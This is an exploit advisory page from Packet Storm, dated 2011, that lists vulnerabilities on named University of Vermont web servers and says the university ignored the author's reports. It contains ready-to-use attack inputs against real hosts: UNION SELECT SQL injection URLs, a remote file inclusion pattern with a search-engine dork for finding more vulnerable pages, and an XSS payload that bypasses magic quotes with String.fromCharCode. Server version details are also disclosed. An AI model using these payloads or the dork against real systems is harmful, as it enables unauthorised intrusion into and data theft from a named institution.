exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

University Of Vermont XSS / RFI / SQL Injection

University Of Vermont XSS / RFI / SQL Injection
Posted Aug 10, 2011
Authored by Codeine

University of Vermont suffers from cross site scripting, remote file inclusion, and remote SQL injection vulnerabilities. The university was contacted and has ignored the Author's emails.

tags | exploit, remote, vulnerability, code execution, xss, sql injection, file inclusion
SHA-256 | 042e2da2853f1be77f5ac55e23963b0da648f369e2e58108152dd4d097b46af5

University Of Vermont XSS / RFI / SQL Injection

Change Mirror Download
##############################################################################################
| Title : University Of Vermont Multiple Vulnerabilities(uvm.edu)
| Author : Codeine
| Email : f3codeine[at]yahoo[dot]com
| Tiwtter: codeinesec
| Date : 08/10/2011
| Cat : PHP[RFI,SQLI,XSS]
| URL : https://uvm.edu/
##############################################################################################
Uname: Linux tarantula.uvm.edu 2.6.23.17-3.uvm #1 SMP Tue Dec 15 12:08:51 EST 2009i686
Software: Apache/2.2.3 (Red Hat). PHP/5.3.3
##############################################################################################

The University Of Vermont suffers from multiple web application vulnerabilities such as
Remote File Inclusion, Sql Injection, Cross Site Scripting(XSS).

##############################################################################################
[*]Remote File Inclusion-
magicscript.php?Page=Calendar&intro=https://google.com/
This script shows up in almost every directory of every subdomain of uvm.edu.
https://vermontdesigninstitute.org/extension/magicscript.php?Page=Calendar&intro=https://google.com/
https://www.uvm.edu/magicscript.php?Page=Calendar&intro=https://google.com/
Dork: site:uvm.edu inurl:magicscript
_________________________________________________________________________________________________
[*]SqlInjection-
https://vmc.snr.uvm.edu/vmc/research/metadata.php?id=-25%20union%20select%20@@version,2,3--
[*]Xss-
https://vmc.snr.uvm.edu/vmc/research/searchresults.php (Post)
Magic quoates are active, but easily bypassable with "String.fromCharCode"
<script>alert(String.fromCharCode(67, 111, 100, 101, 105, 110, 101, 88, 115, 115))</script>
The above is what I sent to post, which contains "CodeineXss"
_________________________________________________________________________________________________
[*]SqlInjection-
https://www.uvm.edu/rsenr/nsrc/projectpages/project.php?id=-69%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89--
_________________________________________________________________________________________________
[*]SqlInjection-
https://bol.uvm.edu/tool_feature.php?id=-1%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
_________________________________________________________________________________________________
Greetz Hidden Ninja
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close